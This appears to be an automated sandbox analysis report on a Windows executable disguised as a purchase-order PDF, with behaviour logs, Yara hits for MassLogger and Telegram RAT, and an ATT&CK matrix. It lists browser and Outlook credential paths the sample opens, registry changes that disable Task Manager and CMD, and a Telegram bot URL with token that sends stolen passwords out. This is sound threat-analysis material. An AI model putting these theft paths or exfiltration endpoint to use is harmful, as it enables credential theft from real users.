Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598493s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -598031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -596110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595372s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -595016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -594688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -594563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -594438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -594328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe TID: 7872	Thread sleep time: -594219s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405846
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 0_2_00406398 FindFirstFileW,FindClose,	0_2_00406398
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405846
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_004027FB FindFirstFileW,	4_2_004027FB
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Code function: 4_2_00406398 FindFirstFileW,FindClose,	4_2_00406398

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599672	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599563	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599426	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598493	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598266	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597813	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597563	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597437	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597328	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 596110	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595985	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595860	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595735	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595610	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595485	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595372	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 595016	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Thread delayed: delay time: 594219	Jump to behavior

Source: PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	API call chain: ExitProcess graph end node			graph_0-3943
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	API call chain: ExitProcess graph end node			graph_0-3762

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Process created: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe "C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe"

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Queries volume information: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Code function: 0_2_00406077 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406077

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables CMD prompt

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Registry value created: DisableCMD 1

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected MassLogger RAT

Source: Yara match	File source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\PURCHASE ORDER TRC-0909718-24_pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR

Remote Access Functionality

Yara detected MassLogger RAT

Source: Yara match	File source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER TRC-0909718-24_pdf.exe PID: 7716, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Email Collection	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	11 Process Injection	31 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	1 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	1 System Network Configuration Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Deobfuscate/Decode Files or Information	Cached Domain Credentials	215 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
PURCHASE ORDER TRC-0909718-24_pdf.exe	47%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsiEA09.tmp\System.dll	0%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.186.174	true	false	high
drive.usercontent.google.com	142.250.185.193	true	false	high
reallyfreegeoip.org	188.114.97.3	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.130.0	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
http://checkip.dyndns.org/	false	high
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.google.com	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.0000000005688000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/-B	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2947972912.00000000385C0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://reallyfreegeoip.org	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D68000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	false	high
https://apis.google.com	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108341057.000000000573C000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2108164783.00000000056F0000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.com	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	PURCHASE ORDER TRC-0909718-24_pdf.exe	false	high
http://api.telegram.org	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035DFA000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035F2F000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035ED7000.00000004.00000800.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000036045000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/t	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000003.2153436162.00000000056FD000.00000004.00000020.00020000.00000000.sdmp, PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2922027566.00000000056EA000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namex	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035CD1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	PURCHASE ORDER TRC-0909718-24_pdf.exe, 00000004.00000002.2946780486.0000000035D50000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
